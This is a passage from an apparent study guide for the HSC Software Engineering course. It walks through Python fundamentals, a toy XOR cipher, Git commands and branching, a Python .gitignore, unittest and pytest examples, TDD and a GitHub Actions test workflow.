print(f"Encrypted string: {repr(cipher)}")

# Decrypt (same operation reverses the flip!)
decrypted = simple_xor_encrypt(cipher, key)
print(f"Decrypted string: {decrypted}") # -> 'HSC'

🐍 Programming with Python

Python is the primary programming language for the HSC Software Engineering course. It uses indentation (not braces) to define code blocks, and reads like English.

📦 Variables, Input & Output

Python

# Variables are dynamically typed — no need to declare a type
name = "Alice"
age = 17
score = 87.5
is_passing = True

# Getting input from the user (always returns a string)
name = input("Enter your name: ")
age = int(input("Enter your age: "))    # Convert to integer
score = float(input("Enter score: "))   # Convert to float

# Output
print("Hello,", name)
print(f"Score: {score:.1f}/100")        # f-string with 1 decimal place

🔀 Selection

Python

# Binary selection
if score >= 50:
    print("Pass")
else:
    print("Fail")

# Multi-way selection (elif chain)
if score >= 90:
    grade = "A"
elif score >= 75:
    grade = "B"
elif score >= 50:
    grade = "C"
else:
    grade = "Fail"
print(f"Grade: {grade}")

🔁 Repetition

Python

# for loop — counted repetition (range gives 1, 2, 3, 4, 5)
total = 0
for i in range(1, 6):
    score = int(input(f"Enter score {i}: "))
    total += score
average = total / 5
print(f"Average: {average}")

# while loop — condition-controlled (pre-test)
password = input("Enter password: ")
while password != "secret123":
    print("Incorrect. Try again.")
    password = input("Enter password: ")
print("Access granted.")

🔧 Functions

Python

# Procedure — performs an action, no return value
def display_result(name, score):
    print(f"{name}: {score}/100")
    if score >= 50:
        print("  → Pass")
    else:
        print("  → Fail")

# Function — returns a computed value
def calculate_grade(score):
    if score >= 90:
        return "A"
    elif score >= 75:
        return "B"
    elif score >= 50:
        return "C"
    else:
        return "Fail"

# Calling them
display_result("Alice", 87)
grade = calculate_grade(87)
print(f"Grade: {grade}")     # Grade: B

📚 Lists & Iteration

Python

scores = [85, 92, 78, 64, 90]

# Access by index (0-based)
print(scores[0])    # 85
print(scores[-1])   # 90 (last element)

# Common list operations
scores.append(77)         # Add to end
scores.sort()             # Sort ascending
scores.sort(reverse=True) # Sort descending
highest = max(scores)
lowest = min(scores)
average = sum(scores) / len(scores)

# Iterate over a list
for s in scores:
    print(s, end=" ")    # 92 90 85 78 77 64

# List comprehension — filter passing scores
passing = [s for s in scores if s >= 50]

💾 File I/O

Python

# Writing to a file
with open("scores.txt", "w") as f:
    for score in scores:
        f.write(str(score) + "\n")

# Reading from a file
with open("scores.txt", "r") as f:
    for line in f:
        value = int(line.strip())   # strip() removes trailing newline
        print(value)

# Appending to an existing file
with open("scores.txt", "a") as f:
    f.write("99\n")

📖 Dictionaries

Python

# Dictionary stores key-value pairs
student = {
    "name": "Alice",
    "age": 17,
    "score": 87.5
}

# Access and update
print(student["name"])          # Alice
student["score"] = 92.0         # Update value
student["subject"] = "SoftEng" # Add new key

# Iterate over key-value pairs
for key, value in student.items():
    print(f"{key}: {value}")

⚠️ Exception Handling

Python — try / except

# Basic exception handling — prevent a crash on bad input
try:
    age = int(input("Enter your age: "))
    print(f"In 10 years you will be {age + 10}")
except ValueError:
    print("Error: please enter a whole number.")

# Handle multiple exception types
try:
    with open("data.txt", "r") as f:
        data = f.read()
    number = int(data.strip())
    result = 100 / number
    print(f"Result: {result}")
except FileNotFoundError:
    print("Error: data.txt not found.")
except ValueError:
    print("Error: file does not contain a valid integer.")
except ZeroDivisionError:
    print("Error: cannot divide by zero.")
finally:
    print(("Processing complete."))   # Runs whether exception occurred or not

When to use try/except: Wrap code that interacts with the outside world — user input, file I/O, network calls, and type conversions — since these can fail for reasons beyond your control. Do not use exceptions to control normal program flow; use IF/ELSE for expected conditions.

Part 5 ⚙️ Quality & Workflow

🔀 Git & Version Control Workflow

Git is a distributed version control system that tracks every change to your code. Every commit is a snapshot — you can revert to any previous state, compare versions, and collaborate without overwriting each other's work.

📋 Core Git Commands Reference

Command	What It Does	Example
`git init`	Initialise a new empty repository	`git init myproject`
`git clone`	Copy a remote repository to your machine	`git clone https://github.com/user/repo.git`
`git status`	Show which files are changed, staged, or untracked	`git status`
`git add`	Stage changes for the next commit	`git add app.py` or `git add .`
`git commit`	Save staged changes as a commit with a message	`git commit -m "Add login feature"`
`git push`	Upload local commits to the remote repository	`git push origin main`
`git pull`	Download and merge remote changes	`git pull origin main`
`git fetch`	Download remote changes without merging	`git fetch origin`
`git branch`	List, create, or delete branches	`git branch feature/login`
`git checkout`	Switch branches or restore files	`git checkout feature/login`
`git switch`	Switch branches (modern alternative to checkout)	`git switch -c feature/login`
`git merge`	Merge a branch into the current branch	`git merge feature/login`
`git log`	Show commit history	`git log --oneline --graph`
`git diff`	Show unstaged changes	`git diff app.py`
`git stash`	Temporarily save uncommitted changes	`git stash pop`
`git tag`	Create a labelled reference to a commit	`git tag v1.0.0`
`git reset`	Undo commits (use with caution!)	`git reset --soft HEAD~1`
`git revert`	Create a new commit that undoes a previous one (safe)	`git revert abc1234`
`git remote`	Manage remote repository connections	`git remote -v`
`git rm`	Remove a file from the repository and staging	`git rm old_file.py`

🌿 Feature Branch Workflow

Feature Branch Workflow
──────────────────────────────────────────────────────────────
main ──●──────────────────────────────────●── stable/deployable
        \                                /
         ● feature/login                ← merged via Pull Request
          \                            /
           ●──●──●  (develop here)   ●── all tests pass
──────────────────────────────────────────────────────────────
Steps:
1. git switch -c feature/login      ← create feature branch
2. write code, git add, git commit  ← develop and commit
3. git push origin feature/login    ← push to remote
4. Open Pull Request on GitHub      ← request code review
5. Peer reviews → approves          ← quality gate
6. Merge into main                  ← integrated and deployed
7. git branch -d feature/login      ← clean up

Bash — Complete Feature Branch Workflow

# Start from an up-to-date main branch
git switch main
git pull origin main

# Create and switch to a new feature branch
git switch -c feature/student-search

# ... write code ...

# Stage and commit changes
git add search.py templates/search.html
git commit -m "Add student search by name and ID"

# Push branch to remote
git push -u origin feature/student-search

# After PR is reviewed and approved:
git switch main
git pull origin main
git merge feature/student-search
git push origin main

# Clean up
git branch -d feature/student-search

🙈 Example .gitignore for Python Projects

.gitignore — Python project

# Virtual environments
venv/
.venv/
env/

# Python bytecode
__pycache__/
*.pyc
*.pyo

# Environment variables (NEVER commit secrets)
.env
.env.local
secrets.json

# IDE files
.vscode/
.idea/
*.swp

# Test coverage reports
.coverage
htmlcov/

# Build outputs
dist/
build/
*.egg-info/

Good Commit Message Guide:
✓ Use imperative mood: "Add login page" not "Added login page"
✓ Keep subject line under 50 characters
✓ Explain why the change was made, not just what
✓ Reference related issue numbers: "Fix input validation (closes #12)"
✗ Don't write: "fix", "wip", "changes", "update stuff"

🧪 Testing Frameworks

Python has two primary testing frameworks. Both allow you to write automated tests that verify your code behaves correctly — automatically, every time you make a change.

🧪 unittest — Built-in Python Testing

Python — unittest example with setUp

import unittest
from bank_account import BankAccount   # the module we're testing

class TestBankAccount(unittest.TestCase):

    def setUp(self):
        """Runs before each test method — creates fresh test data."""
        self.account = BankAccount("Alice", 1000)

    def tearDown(self):
        """Runs after each test method — clean up if needed."""
        pass

    def test_initial_balance(self):
        self.assertEqual(self.account.balance, 1000)

    def test_deposit_increases_balance(self):
        self.account.deposit(500)
        self.assertEqual(self.account.balance, 1500)

    def test_withdraw_decreases_balance(self):
        self.account.withdraw(200)
        self.assertEqual(self.account.balance, 800)

    def test_withdraw_insufficient_funds_raises_error(self):
        with self.assertRaises(ValueError):
            self.account.withdraw(9999)

    def test_deposit_negative_raises_error(self):
        with self.assertRaises(ValueError):
            self.account.deposit(-50)

    def test_balance_cannot_go_negative(self):
        self.account.withdraw(1000)
        self.assertGreaterEqual(self.account.balance, 0)

if __name__ == '__main__':
    unittest.main(verbosity=2)

🐍 pytest — Modern Python Testing

pytest is simpler to write and provides more detailed failure output than unittest. Tests are just functions prefixed with test_.

Python — pytest with fixture and parametrize

import pytest
from bank_account import BankAccount

@pytest.fixture
def account():
    """pytest fixture — creates a BankAccount for each test."""
    return BankAccount("Bob", 500)

def test_deposit(account):
    account.deposit(100)
    assert account.balance == 600

def test_withdraw(account):
    account.withdraw(200)
    assert account.balance == 300

# Parametrize: run same test with multiple inputs
@pytest.mark.parametrize("amount,expected", [
    (100, 600),
    (500, 1000),
    (0.01, 500.01),
])
def test_deposit_parametrized(account, amount, expected):
    account.deposit(amount)
    assert account.balance == pytest.approx(expected)

⚖️ unittest vs pytest Comparison

Feature	unittest	pytest
Syntax	Class-based, verbose	Function-based, minimal
Built into Python?	Yes	No — requires `pip install pytest`
Failure output	Basic	Detailed diff with variable values
Fixtures	`setUp`/`tearDown`	`@pytest.fixture` — more flexible
Parametrised tests	Requires subTest or loops	`@pytest.mark.parametrize`
HSC recommendation	Fine for simple projects	Preferred for clean, readable tests

🔄 TDD — Test-Driven Development

TDD Cycle: Red → Green → Refactor
──────────────────────────────────────────
🔴 RED      Write a failing test FIRST
            (the feature doesn't exist yet — test must fail)
      ↓
🟢 GREEN    Write the minimum code to make the test pass
            (don't over-engineer — just make it pass)
      ↓
🔵 REFACTOR Improve the code's design without changing behaviour
            (tests still pass — they protect against regressions)
      ↓
  Repeat for the next feature
──────────────────────────────────────────

Code Coverage: Run coverage run -m pytest then coverage report to see what percentage of your code is executed by tests. Aim for >80% coverage. Missing lines shown with coverage html → open htmlcov/index.html.

⚙️ CI/CD — Continuous Integration & Deployment

CI/CD automates the build, test, and deployment pipeline. Every time code is pushed, the pipeline runs automatically — catching bugs before they reach production.

Continuous Integration (CI)Automatically build and test code on every push. If any test fails, the team is immediately notified. Prevents "works on my machine" problems by testing on a fresh, consistent environment.

Continuous Deployment (CD)Automatically deploy code to production (or staging) when all tests pass. The pipeline handles build, test, and deploy without manual steps.

🚀 GitHub Actions — Automated Testing on Push

YAML — .github/workflows/tests.yml

name: Run Tests

on:
  push:
    branches: [ main, develop ]
  pull_request:
    branches: [ main ]

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
    - name: Check out code
      uses: actions/checkout@v4

    - name: Set up Python 3.11
      uses: actions/setup-python@v4
      with:
        python-version: '3.11'

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install -r requirements.txt
        pip install pytest coverage

    - name: Run tests with coverage
      run: |
        coverage run -m pytest tests/ -v
        coverage report --fail-under=80

CI/CD Benefits for HSC Projects:
Even for solo HSC projects, a CI pipeline adds value — every push is automatically tested, so you always know whether your changes broke anything. It also demonstrates professional development practice in your folio documentation.

📘

Syllabus Alignment

These specifications are based on the NESA Software Engineering 11–12 Course Specifications (updated Feb 2025).